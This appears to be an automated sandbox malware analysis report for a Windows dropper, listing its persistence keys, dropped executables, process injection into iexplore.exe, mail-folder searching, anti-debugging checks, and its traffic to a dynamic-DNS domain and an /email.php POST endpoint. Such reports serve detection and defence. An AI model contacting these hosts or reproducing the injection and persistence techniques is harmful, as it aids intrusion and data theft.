Source: iexplore.exe	String found in binary or memory: yahoo.com equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: degreat248.no-ip.org

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /email.php HTTP/1.1 Content-Length: 1386 Accept: text/html, */* Content-Type: multipart/form-data; boundary=---------------------------090715185326217 User-Agent: Mozilla/3.0 (compatible; TALWinInetHTTPClient) Host: degreat.host56.com Connection: Keep-Alive Cache-Control: no-cache

HTTP GET or POST without a user agent

Show sources

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1 Host: ip4.telize.com Connection: Keep-Alive

Uses SMTP (mail sending)

Show sources

Source: global traffic

TCP traffic: 192.168.1.12:49169 -> 74.201.154.90:587

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.1.12:49167 -> 197.211.52.12:9003
Source: global traffic	TCP traffic: 192.168.1.12:49169 -> 74.201.154.90:587

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: degreat248.no-ip.org

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Default NKey
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Default NKey
Source: C:\Program Files\Internet Explorer\iexplore.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IPS
Source: C:\Program Files\Internet Explorer\iexplore.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IPS

Creates autostart registry keys with suspicious names

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Default NKey

Creates multiple autostart registry keys

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IPS
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Default NKey

Stealing of Sensitive Information:

Searches for Windows Mail specific files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Program Files\Internet Explorer\iexplore.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe	File created: C:\Users\admin\AppData\Roaming\IPS\ips.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	File created: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	File created: C:\Users\admin\AppData\Roaming\Default NFolder\Default File.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	File created: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	File created: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	File created: C:\Users\admin\AppData\Roaming\Java\java.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

Code function: 5_2_00441F3C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

5_2_00441F3C

PE file contains an invalid checksum

Show sources

Source: FB_390E.tmp.exe.3388.dr	Static PE information: real checksum: should be: 0x134715
Source: ips.exe.3608.dr	Static PE information: real checksum: should be: 0x134715
Source: Default File.exe.3544.dr	Static PE information: real checksum: should be: 0xebaeb
Source: FB_3804.tmp.exe.3388.dr	Static PE information: real checksum: should be: 0xebaeb
Source: 40D19FBA73C6B011814E2C6920E8792F.exe	Static PE information: real checksum: should be: 0x2542d4
Source: java.exe.3552.dr	Static PE information: real checksum: should be: 0x92729
Source: FB_3449.tmp.exe.3388.dr	Static PE information: real checksum: should be: 0x92729

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	2_2_004087A4
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	2_2_0040598C
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	2_1_004087A4
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	2_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	5_2_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	5_2_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	5_1_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	5_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_2_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_2_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_1_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	7_2_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_2_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	7_1_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 10_2_00405358 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	10_2_00405358
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 10_1_00405358 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	10_1_00405358
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_00409D7C FindFirstFileA,GetLastError,	11_2_00409D7C
Source: C:\Program Files\Internet Explorer\iexplore.exe	Code function: 11_2_0040672C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	11_2_0040672C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_2_004087A4
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_2_0040598C
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_1_004087A4
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 12_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_1_0040598C

System Summary:

Uses Microsoft Silverlight

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Submission file is bigger than most known malware samples

Show sources

Source: 40D19FBA73C6B011814E2C6920E8792F.exe

Static file information: File size 2423296 > 1048576

Uses new MSVCR Dlls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll

PE file has a big raw section

Show sources

Source: 40D19FBA73C6B011814E2C6920E8792F.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1e4200

Binary contains paths to debug symbols

Show sources

Source:	Binary string: mscorlib.pdb source: FB_3804.tmp.exe
Source:	Binary string: \C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll` source: FB_3804.tmp.exe
Source:	Binary string: C:\Windows\System.pdbMI source: FB_3449.tmp.exe
Source:	Binary string: C:\Windows\dll\System.pdbCo source: FB_3449.tmp.exe
Source:	Binary string: nsymbols\dll\System.pdb\ source: FB_3804.tmp.exe
Source:	Binary string: System.pdb source: FB_3804.tmp.exe
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: FB_3804.tmp.exe
Source:	Binary string: D:\Andrew\AForge.NET\trunk\Sources\Video.DirectShow\obj\Release\AForge.Video.DirectShow.pdb source: FB_3804.tmp.exe
Source:	Binary string: em.pdb source: FB_3804.tmp.exe
Source:	Binary string: C:\Windows\System.pdb source: FB_3804.tmp.exe
Source:	Binary string: c:\Users\Shockwave\Documents\Visual Studio 2012\Projects\LZLoader\LZLoader\obj\Debug\LZLoader.pdb source: FB_3804.tmp.exe
Source:	Binary string: T3,pC:\Windows\System.pdb source: FB_3804.tmp.exe
Source:	Binary string: C:\Users\Shockwave\Documents\Visual Studio 2013\Projects\HookWrapper\HookWrapper\obj\Debug\HookWrapper.pdb source: FB_3804.tmp.exe
Source:	Binary string: C:\Windows\dll\System.pdb source: FB_3804.tmp.exe
Source:	Binary string: c:\Users\Shockwave\Desktop\New folder (2)\SevenZip\Compress\LzmaAlone\obj\Debug\Lzma.pdb source: FB_3804.tmp.exe
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: FB_3804.tmp.exe
Source:	Binary string: D:\Andrew\AForge.NET\trunk\Sources\Video\obj\Release\AForge.Video.pdb source: FB_3804.tmp.exe
Source:	Binary string: G:\Files\Imminent Methods\Code\Main Project\Imminent Monitor\ClientPlugin\obj\Debug\ClientPlugin.pdb source: FB_3804.tmp.exe
Source:	Binary string: indows\System.pdbpdbtem.pdb source: FB_3804.tmp.exe
Source:	Binary string: D:\Andrew\AForge.NET\trunk\Sources\Video.DirectShow\obj\Release\AForge.Video.DirectShow.pdb\| source: FB_3804.tmp.exe

Contains functionality for error logging

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_0041FD98 GetLastError,FormatMessageA,

2_2_0041FD98

Contains functionality to check free disk space

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_00408914 GetDiskFreeSpaceA,

2_2_00408914

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_00413784 FindResourceA,

2_2_00413784

Creates files inside the user directory

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

File created: C:\Users\admin\AppData\Roaming\Default NFolder

Creates temporary files

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

File created: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp

Executable is probably coded in Delphi

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Window created: window name: TPUtilWindow

Executable uses .NET runtime (Probably coded in C#)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll

Reads ini files

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

Key opened: HKEY_USERS\Software\Policies\Microsoft\SystemCertificates\CA

Spawns processes

Show sources

Source: unknown	Process created: C:\40D19FBA73C6B011814E2C6920E8792F.exe
Source: unknown	Process created: C:\Windows\System32\notepad.exe
Source: unknown	Process created: C:\40D19FBA73C6B011814E2C6920E8792F.exe
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Users\admin\AppData\Roaming\Java\java.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process created: C:\40D19FBA73C6B011814E2C6920E8792F.exe C:\40D19FBA73C6B011814E2C6920E8792F.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process created: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process created: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Process created: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process created: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Process created: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process created: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Process created: C:\Users\admin\AppData\Roaming\Java\java.exe C:\Users\admin\AppData\Roaming\Java\java.exe
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Contains functionality to call native functions

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 10_2_0040CB64 CreateProcessA,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,TerminateProcess,		10_2_0040CB64
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 10_1_0040CB64 CreateProcessA,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,TerminateProcess,		10_1_0040CB64

Creates mutexes

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\B57F87A170C39A8676DBE3A5B493A2BD
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\f01b7c4f-6f5c-4365-964f-fb233b5a773b
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

PE file contains executable resources (Code or Archives)

Show sources

Source: 40D19FBA73C6B011814E2C6920E8792F.exe	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped
Source: FB_3449.tmp.exe.3388.dr	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped
Source: FB_3804.tmp.exe.3388.dr	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped
Source: FB_390E.tmp.exe.3388.dr	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped
Source: Default File.exe.3544.dr	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped
Source: java.exe.3552.dr	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped
Source: ips.exe.3608.dr	Static PE information: Resource name: RT_STRING type: Hitachi SH big-endian COFF object, not stripped

PE file contains strange resources

Show sources

Source: 40D19FBA73C6B011814E2C6920E8792F.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: FB_3449.tmp.exe.3388.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: FB_3804.tmp.exe.3388.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: FB_390E.tmp.exe.3388.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Default File.exe.3544.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: java.exe.3552.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ips.exe.3608.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts

Tries to load missing DLLs

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Section loaded: axlzzmdd9htbqccvaul8.dll
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Section loaded: axlzzmdd9htbqccvaul8.dll
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Section loaded: axlzzmdd9htbqccvaul8.dll
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Section loaded: axlzzmdd9htbqccvaul8.dll

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: FB_3804.tmp.exe	Binary or memory string: Program ManagerH
Source: FB_3804.tmp.exe	Binary or memory string: Program Managerx
Source: notepad.exe, FB_3804.tmp.exe, java.exe	Binary or memory string: Shell_TrayWnd@
Source: FB_3804.tmp.exe	Binary or memory string: Program ManagerLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLIST
Source: FB_3804.tmp.exe	Binary or memory string: ProgMan
Source: notepad.exe, FB_3804.tmp.exe, java.exe	Binary or memory string: Progman
Source: notepad.exe, FB_3804.tmp.exe, java.exe	Binary or memory string: Program Manager
Source: notepad.exe, FB_3804.tmp.exe, java.exe	Binary or memory string: Shell_TrayWnd
Source: FB_3804.tmp.exe	Binary or memory string: Shell_traywnd

Allocates memory in foreign processes

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe

Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe

Code function: 10_2_0040CB64 CreateProcessA,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,TerminateProcess,

10_2_0040CB64

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe

Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Section loaded: unknown target pid: 3388 protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Thread register set: target process: 3388

Writes to foreign memory regions

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 400000
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 7FFD4008

Benign windows process drops PE files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: ips.exe.3608.dr

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

System information queried: KernelDebuggerInformation

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

Code function: 5_2_0045B93C GetForegroundWindow,Sleep,GetForegroundWindow,OutputDebugStringA,OutputDebugStringA,GetMessageTime,GetWinMetaFileBits,GetLastError,GetTickCount,LoadLibraryA,FindAtomA,FindAtomA,FindAtomA,GetTickCount,GetModuleHandleA,LoadCursorA,GetTickCount,lstrlen,

5_2_0045B93C

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

5_2_00441F3C

Enables debug privileges

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	2_2_004087A4
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	2_2_0040598C
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	2_1_004087A4
Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe	Code function: 2_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	2_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	5_2_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	5_2_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	5_1_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 5_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	5_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_2_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_2_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_1_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 6_1_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_1_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	7_2_004087A4
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_2_0040598C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_2_0040598C
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 7_1_004087A4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	7_1_004087A4
